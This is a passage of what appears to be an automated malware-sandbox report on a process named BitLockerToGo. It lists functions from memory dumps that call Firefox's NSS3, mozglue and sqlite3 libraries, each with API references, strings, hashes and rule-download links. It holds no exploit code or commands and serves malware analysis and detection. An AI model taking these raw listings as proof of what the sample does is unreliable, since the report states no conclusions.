                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 2524771861-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 68625302c0e6246a5151e762d8188014ffc30d0c83bc65bf1a902c26e49c829e
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 148519ca50ad557006aa0ca9b6a63dcfc573e09e33066ce1c1c3a2ba21569053
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 68625302c0e6246a5151e762d8188014ffc30d0c83bc65bf1a902c26e49c829e
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C98183B5A00215ABDF01DFA4DD45BDEBBB5BF0C358F190024E919A3711EB31E9A4CBA1
                                                                                                                                                                                                                                                                                                                    Function 6CAA4CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PK11_SignatureLen.NSS3(?), ref: 6CAA4D80
                                                                                                                                                                                                                                                                                                                    • PORT_Alloc_Util.NSS3(00000000), ref: 6CAA4D95
                                                                                                                                                                                                                                                                                                                    • PORT_NewArena_Util.NSS3(00000800), ref: 6CAA4DF2
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAA4E2C
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE028,00000000), ref: 6CAA4E43
                                                                                                                                                                                                                                                                                                                    • PORT_NewArena_Util.NSS3(00000800), ref: 6CAA4E58
                                                                                                                                                                                                                                                                                                                    • SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6CAA4E85
                                                                                                                                                                                                                                                                                                                    • DER_Encode_Util.NSS3(?,?,6CBF05A4,00000000), ref: 6CAA4EA7
                                                                                                                                                                                                                                                                                                                    • PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6CAA4F17
                                                                                                                                                                                                                                                                                                                    • DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6CAA4F45
                                                                                                                                                                                                                                                                                                                    • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CAA4F62
                                                                                                                                                                                                                                                                                                                    • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6CAA4F7A
                                                                                                                                                                                                                                                                                                                    • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CAA4F89
                                                                                                                                                                                                                                                                                                                    • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CAA4FC8
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 2843999940-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 1dea200e7e1cf6f8da642549adf16231ad3473add871c8ab993cbd580475b291
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 4a7d49b6eb7a0a897816d01854307a65a02c16ea25c7e9e1bb493e7fdb13e822
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1dea200e7e1cf6f8da642549adf16231ad3473add871c8ab993cbd580475b291
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D81B271908301AFE711CFA4DD40B5BB7E4AB88718F14952DF958CB641EB31E98ACB92
                                                                                                                                                                                                                                                                                                                    Function 6C9CD4D0 Relevance: 21.2, APIs: 14, Instructions: 165threadCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C9CD4F0
                                                                                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C9CD4FC
                                                                                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C9CD52A
                                                                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C9CD530
                                                                                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C9CD53F
                                                                                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C9CD55F
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C9CD585
                                                                                                                                                                                                                                                                                                                    • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C9CD5D3
                                                                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C9CD5F9
                                                                                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C9CD605
                                                                                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C9CD652
                                                                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C9CD658
                                                                                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C9CD667
                                                                                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C9CD6A2
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 2206442479-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 8b0f776c510ab473107d1d224b08e380ca3bf064564383a71e8ff50e319bcbdb
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 15df753bf4b5e13bfc45be3fe75121d9206fb4e160f7a1b8ecf763cce6951d52
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b0f776c510ab473107d1d224b08e380ca3bf064564383a71e8ff50e319bcbdb
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 10516C75608705DFC704DF24C884A9ABBF4FF99358F108A2EE95A87710DB30E945CB92
                                                                                                                                                                                                                                                                                                                    Function 6CAD6C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CAD781D,00000000,6CACBE2C,?,6CAD6B1D,?,?,?,?,00000000,00000000,6CAD781D), ref: 6CAD6C40
                                                                                                                                                                                                                                                                                                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CAD781D,?,6CACBE2C,?), ref: 6CAD6C58
                                                                                                                                                                                                                                                                                                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CAD781D), ref: 6CAD6C6F
                                                                                                                                                                                                                                                                                                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CAD6C84
                                                                                                                                                                                                                                                                                                                    • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CAD6C96
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA81240: TlsGetValue.KERNEL32(00000040,?,6CA8116C,NSPR_LOG_MODULES), ref: 6CA81267
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA81240: EnterCriticalSection.KERNEL32(?,?,?,6CA8116C,NSPR_LOG_MODULES), ref: 6CA8127C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA81240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CA8116C,NSPR_LOG_MODULES), ref: 6CA81291
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA81240: PR_Unlock.NSS3(?,?,?,?,6CA8116C,NSPR_LOG_MODULES), ref: 6CA812A0
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CAD6CAA
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
                                                                                                                                                                                                                                                                                                                    • String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
                                                                                                                                                                                                                                                                                                                    • API String ID: 4221828374-3736768024
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 182ed8def55a9cb0e6ed6840d2e1a4ac39cecf5ae8d6d546e74588d0050224fe
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 883bebc16850bd4de2daa64446714f62d4724dd697420ecdca7255ada1a2f7c1
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 182ed8def55a9cb0e6ed6840d2e1a4ac39cecf5ae8d6d546e74588d0050224fe
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D401F2A170238123E660277E6C4EF66360C9F416A8F1A0831FE18E1A81FBA2F51840A5
                                                                                                                                                                                                                                                                                                                    Function 6CA8ACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 786543732-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: fcf9a5d89d584cb98342b6e85c6d2f03106361addd22f4a3ce82ed12ad350469
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 94f9de1f523af147d08bb520c541425d624cf0943dd6f8e3f9aba5c5990afb61
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fcf9a5d89d584cb98342b6e85c6d2f03106361addd22f4a3ce82ed12ad350469
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4551A3B1E021259BDF00DFA4E84176E7775FB0A749F180525D815A7B40D331AD95CBE1
                                                                                                                                                                                                                                                                                                                    Function 6CB64C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • sqlite3_value_text16.NSS3(?), ref: 6CB64CAF
                                                                                                                                                                                                                                                                                                                    • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CB64CFD
                                                                                                                                                                                                                                                                                                                    • sqlite3_value_text16.NSS3(?), ref: 6CB64D44
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: sqlite3_value_text16$sqlite3_log
                                                                                                                                                                                                                                                                                                                    • String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
                                                                                                                                                                                                                                                                                                                    • API String ID: 2274617401-4033235608
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 9a13b0a968e5f05bc7f4a2cc343a848a1bee8271ddaa1f9221d6971275790c99
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 262865c5d3969451e6c5b475f322cef000a09b94135e31a5fd578526eb8cea7f
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a13b0a968e5f05bc7f4a2cc343a848a1bee8271ddaa1f9221d6971275790c99
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EB313772E08CE1ABD708C62AE8317A97365FB8231CF150125D4245BF59CB21AC568FD3
                                                                                                                                                                                                                                                                                                                    Function 6C9BEC70 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81threadsynchronizationCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C984A68), ref: 6C9B945E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C9B9470
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C9B9482
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9B9420: __Init_thread_footer.LIBCMT ref: 6C9B949F
                                                                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C9BEC84
                                                                                                                                                                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C9BEC8C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9B94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C9B94EE
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9B94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C9B9508
                                                                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C9BECA1
                                                                                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C9FF4B8), ref: 6C9BECAE
                                                                                                                                                                                                                                                                                                                    • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C9BECC5
                                                                                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C9FF4B8), ref: 6C9BED0A
                                                                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C9BED19
                                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 6C9BED28
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C9BED2F
                                                                                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C9FF4B8), ref: 6C9BED59
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    • [I %d/%d] profiler_ensure_started, xrefs: 6C9BEC94
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
                                                                                                                                                                                                                                                                                                                    • String ID: [I %d/%d] profiler_ensure_started
                                                                                                                                                                                                                                                                                                                    • API String ID: 4057186437-125001283
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 5be266676410c047d6f2a4d467c426aaee385cbaacef322e6ad2a9a3b5cbfe76
                                                                                                                                                                                                                                                                                                                    • Instruction ID: bf18b83e0351286a066d03d3fee3f7aa773753c0bcdd9411166a575d4253e6a7
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5be266676410c047d6f2a4d467c426aaee385cbaacef322e6ad2a9a3b5cbfe76
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4821E275604108BFDB009F64E808AAB77BDEF9626CF204211FD28A7B41DB75D806CBE1
                                                                                                                                                                                                                                                                                                                    Function 6CB62D40 Relevance: 18.2, APIs: 12, Instructions: 187COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • sqlite3_initialize.NSS3 ref: 6CB62D9F
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA1CA30: EnterCriticalSection.KERNEL32(?,?,?,6CA7F9C9,?,6CA7F4DA,6CA7F9C9,?,?,6CA4369A), ref: 6CA1CA7A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA1CA30: LeaveCriticalSection.KERNEL32(?), ref: 6CA1CB26
                                                                                                                                                                                                                                                                                                                    • sqlite3_exec.NSS3(?,?,6CB62F70,?,?), ref: 6CB62DF9
                                                                                                                                                                                                                                                                                                                    • sqlite3_free.NSS3(00000000), ref: 6CB62E2C
                                                                                                                                                                                                                                                                                                                    • sqlite3_free.NSS3(?), ref: 6CB62E3A
                                                                                                                                                                                                                                                                                                                    • sqlite3_free.NSS3(?), ref: 6CB62E52
                                                                                                                                                                                                                                                                                                                    • sqlite3_mprintf.NSS3(6CBCAAF9,?), ref: 6CB62E62
                                                                                                                                                                                                                                                                                                                    • sqlite3_free.NSS3(?), ref: 6CB62E70
                                                                                                                                                                                                                                                                                                                    • sqlite3_free.NSS3(?), ref: 6CB62E89
                                                                                                                                                                                                                                                                                                                    • sqlite3_free.NSS3(?), ref: 6CB62EBB
                                                                                                                                                                                                                                                                                                                    • sqlite3_free.NSS3(?), ref: 6CB62ECB
                                                                                                                                                                                                                                                                                                                    • sqlite3_free.NSS3(00000000), ref: 6CB62F3E
                                                                                                                                                                                                                                                                                                                    • sqlite3_free.NSS3(?), ref: 6CB62F4C
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1957633107-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: c9dee177de6efde2f5eca198b0e74d3784b877f4c2b9c33a86e0dd6d095a7475
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 367ffb3cccafa019352c41a471eb174a0ad13f536148a882d073befb3db1f8e7
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c9dee177de6efde2f5eca198b0e74d3784b877f4c2b9c33a86e0dd6d095a7475
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D6190B5E052558BFB00CFA9D984BDEB7B1EF48348F144024EC15A7B41E735E848CBA2
                                                                                                                                                                                                                                                                                                                    Function 6CAB2C40 Relevance: 18.2, APIs: 12, Instructions: 163COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32(6CAB3F23,?,6CAAE477,?,?,?,00000001,00000000,?,?,6CAB3F23,?), ref: 6CAB2C62
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(0000001C,?,6CAAE477,?,?,?,00000001,00000000,?,?,6CAB3F23,?), ref: 6CAB2C76
                                                                                                                                                                                                                                                                                                                    • PL_HashTableLookup.NSS3(00000000,?,?,6CAAE477,?,?,?,00000001,00000000,?,?,6CAB3F23,?), ref: 6CAB2C86
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(00000000,?,?,?,?,6CAAE477,?,?,?,00000001,00000000,?,?,6CAB3F23,?), ref: 6CAB2C93
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB3DD70: TlsGetValue.KERNEL32 ref: 6CB3DD8C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB3DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CB3DDB4
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32(?,?,?,?,?,6CAAE477,?,?,?,00000001,00000000,?,?,6CAB3F23,?), ref: 6CAB2CC6
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6CAAE477,?,?,?,00000001,00000000,?,?,6CAB3F23,?), ref: 6CAB2CDA
                                                                                                                                                                                                                                                                                                                    • PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6CAAE477,?,?,?,00000001,00000000,?,?,6CAB3F23), ref: 6CAB2CEA
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6CAAE477,?,?,?,00000001,00000000,?), ref: 6CAB2CF7
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6CAAE477,?,?,?,00000001,00000000,?), ref: 6CAB2D4D
